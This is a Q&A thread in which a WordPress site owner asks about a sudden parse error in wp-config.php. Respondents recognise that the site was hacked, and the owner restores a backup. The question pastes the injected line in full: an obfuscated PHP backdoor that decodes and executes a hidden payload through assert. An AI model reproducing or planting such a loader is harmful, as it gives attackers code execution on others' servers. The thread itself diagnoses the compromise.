# Wordpress Gave Error in wp-config.php although no change

Tags: php, wordpress

I bought a Wordpress theme from wpmod.com 
I was using the theme for 8 months without any problem
I dont have knowledge about Wordpress settings, they setup the website and gave me the admin information and I added my products. 
It was working great but yesterday, it failed.

Parse error: syntax error, unexpected '"', expecting T_STRING in /home/muratmer/public_html/wp-config.php on line 99 
This message exists in the main of the website. muratmercedesparca.com
Yesterday, it was showing error on line 93
Today it shows on line 99
I cant achieve people who I bought theme from.

On line 99, this code is seen

```
$AWdh1P=\"nROIHuIYUogoNKJ5y8FfGMQxJV8TfN0JtxEQnletMZIniycPJHJXrXd3ib7C4zTDYSXVjUHLqYSbDM6C5ImMjQiIvw9BtrogFOtxnx9n1GncBxHdXeGfDztPwktXno4hcoW2qeLJUPJPxyLU/LfXQzlPXPktVIw8uKwwbH2+dy8sboj/nul3VKkUfvTl90jPmHkOQyoB21nwIZ5/pe7OMeO9mDTvOEsNbPz1IY9wYlo7IEf7zFRqQ+/B4t2EzXiD1m7ju4/YUBn4JQqBChmaZsp0QdaCmM3IIPEwHURT/IxqhTDn+lTqr/DnWe/R0rOIdKSCn4RstQfDPRH9OVbEv2RMxtgMfnqHdFtA4agM2KZE67EN1q/Ohc6LO5o47k3RtI+T3Vpg7P3KfUY0AVE/10rlcTffXYanU3T0T1MGNiJFz/37+aJZngGGSWgbjlK5DB/u44l1wjeYu6lParrRYrQC1NFfilXe0z9xS/57fylDpBPE9CvRszRoT6Kllf3cxsVmbLRkjOan4Tsqz8iE2Ggzcx7aEbxx1xV2G8Y1kzZgvJ73XuzX0ReDvPL2CpqVX5BdQmLJ9OYazXfSr9mQ6m4muMSQ+0duOV7DSakcZv87eUEM/69Cwl58LzKbMUJ8AtKePrJ2v71xHMr9EiJu3Cv97lQMnYc2l5UJX0Yh2UtxfyFwymYcG9sRzelTRTi3MleFmUKi42cGwN2rLQyQx4Lk5Tx6tHHrQuzwe+LlvBy2PR33Ac6+XncQmipmNcfi/TBMqvIKmLzTWlVVyTMZ3JUdEyEZjd8CcTzwSDfrBTjt71Nv78HOyzse5DiZoFZ59wVLoVzwdiVyAtEBQTpy276WnNbZXtX7RwhB8v+fRvSrhWWad+YEhWTgjocdsizLVPBj7OrzXuahAY9Ub/yz03wQZcmVj4BfAr/oXhxeeKG6URKgsoATHJKmPFVUzm7Tod1dIKWL+IaLK6Cjoj2J+2Gnh0jXlagQ3oG+fg==\";$bbwEToxQ=\"\\163\\164\";$jknDAkscD=\"\\x62\\141\\163\";$hLawTA=\"\\141\";$voJZ7U=\"\\147\\172\\151\";$Wx2pvJa7=\"Fl1YmASDI3RZG8xjQYOIlpeBp3UZYx520LNXnIde5TK5+kq\";$voJZ7U.=\"\\x6e\\x66\";$Wx2pvJa7.=\"I5noMXvyMd4EKTOJHrFJn2lcShWHUIvcMc+HKnnu4ySt4Tt\";$hLawTA.=\"\\163\";$jknDAkscD.=\"\\x65\\x36\\64\";$bbwEToxQ.=\"\\x72\\x5f\\x72\";$Wx2pvJa7.=\"GMTyuQJGozWuLjgen2WgjVCqixwPXA/XVHzCUEHRJkzaStH\";$bbwEToxQ.=\"\\x6f\\x74\";$hLawTA.=\"\\x73\\x65\";$voJZ7U.=\"\\x6c\\x61\";$jknDAkscD.=\"\\x5f\\144\\x65\\143\";$hLawTA.=\"\\162\\164\";$Wx2pvJa7.=\"MwkZUSI01uAGJhUIWNeIpelinYZDmKtctSy1QJgND==\";$jknDAkscD.=\"\\157\\x64\\145\";$bbwEToxQ.=\"\\x31\\63\";$voJZ7U.=\"\\x74\\x65\";@$hLawTA($voJZ7U($jknDAkscD($bbwEToxQ($Wx2pvJa7))));
```

Answer (score 1, accepted):

Sounds like the site is hacked. The file contains malicious base64 encoded code. I am not saying the theme authors put it there but its there now. Looks like you need to clean the site completely.

https://codex.wordpress.org/FAQ_My_site_was_hacked

Also using a plugin like this in future greatly helps

https://wordpress.org/plugins/wordfence/

PS: Use a supported, up to date theme in future. It really makes sense paying a few dollars for one.

Comment: Yes, I had gave my FTP information to the author for installation and I did not change it. I uploaded my FTP backup and it is fixed.

Comment: Cool .. best to take protective measures now going forward.